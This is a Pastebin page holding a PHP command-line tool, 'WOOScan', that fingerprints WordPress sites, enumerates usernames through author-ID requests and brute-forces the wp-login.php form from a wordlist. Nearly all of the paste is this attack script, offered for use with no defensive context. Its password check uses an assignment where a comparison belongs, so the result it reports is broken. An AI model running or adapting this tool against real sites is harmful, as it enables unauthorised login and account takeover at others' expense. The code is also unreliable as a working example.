Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /*
- Jayalah Negriku ~
- @Title : WOOScan V.0.1
- @About : Wordpress Tools
- @Code By : ZakirDotID
- */
- error_reporting(0);
- function check($url){
- $get = curls($url,null);
- preg_match("/name=\"generator\" content=\"WordPress (.*)\"/", $get , $result);
- $do = $result[0];
- if($do!=""){
- v("\t[ ".date("H:i:s")." ] $url ==> Wordpress\n ");
- } else {
- v("\t[ ".date("H:i:s")." ] $url ==> Not WordPress\n ");
- }
- }
- function curls($url,$data = null){
- $ch = curl_init($url);
- curl_setopt($ch, CURLOPT_URL, $url);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36");
- if($data !=null) {
- curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
- }
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
- $result = curl_exec($ch);
- return $result;
- curl_close($ch);
- }
- function v($x=""){
- echo $x;
- }
- function uc($url){
- v("\t[ ".date("H:i:s")." ] Check Username : ".$url."\n");
- for($id=1;$id<=10;$id++){
- $get = curls("$url?author=$id",null);
- preg_match("/<body class=\"archive author author-(.*?) author-$id/", $get, $login);
- $login = $login[1];
- if($login!=""){
- v("\t[ ".date("H:i:s")." ] ID ( $id ) | Username => $login \n");
- } else {
- v("\t[ ".date("H:i:s")." ] ID ( $id ) | Username Not Found!\n");
- }
- }
- }
- function bf($url,$username,$password){
- $get = curls($url."wp-login.php","&log=$username&pwd=$password");
- preg_match("/The password you entered for the username/", $get , $login);
- if($login[0]=""){
- v("\t[ ".date("H:i:s")." ] Cracking.... | Password => $password\n");
- } else {
- v("\t[ ".date("H:i:s")." ] Cracking.... | Not Matches => $password\n");
- }
- }
- function banner(){
- v("\n\t====================================================\n\tWOOScan Beta\n\t====================================================\n\tWordpress Tools Scan V.0.1 \n\tTools Running In Device [ ".OS()." ]\n\tCode By ZakirDotID\n\tUsage : -help\n\t====================================================\n");
- }
- function _rd(){
- return fopen('php://stdin', 'r');
- }
- function OS() {
- return (substr(strtoupper(PHP_OS), 0, 3) === "WIN") ? "Windows" : "Linux";
- }
- if (OS()=="Windows") {
- exit("\n\tJust Tested In Linux!");
- }
- if (isset($argv[1])) {
- switch ($argv[1]) {
- case '-help':
- banner();
- break;
- case '-scan':
- banner();
- v("\n\tScanning Site Wordpress Beta | Example : http://www.site.com/path/\n\tInput Url : ");
- $url = _rd();
- $url = trim(fgets(_rd()));
- check($url);
- break;
- case '-usercheck':
- banner();
- v("\n\tScanning Username Wordpress Beta | Example : http://www.site.com/path/\n\tInput Url : ");
- $url = trim(fgets(_rd()));
- uc($url);
- break;
- case '-wpbf':
- banner();
- v("\n\tBrute Force Wordpress Beta | Example : http://www.site.com/path/ \n\tInput Url : ");
- $url = _rd();
- $url = trim(fgets($url));
- v("\tInput Username : ");
- $username = trim(fgets(_rd()));
- v("\tInput Wordist : ");
- $list = trim(fgets(_rd()));
- $paswd = file_get_contents($list) or exit("\n\tFile Not found!\n");
- $paswds = explode("\r\n", $paswd);
- v("\tPlease Wait....\n");
- sleep(1);
- foreach ($paswds as $password) {
- bf($url,$username,$password);
- }
- break;
- default:
- banner();
- break;
- }
- } else {
- banner();
- v("\tError Command Not found!");
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement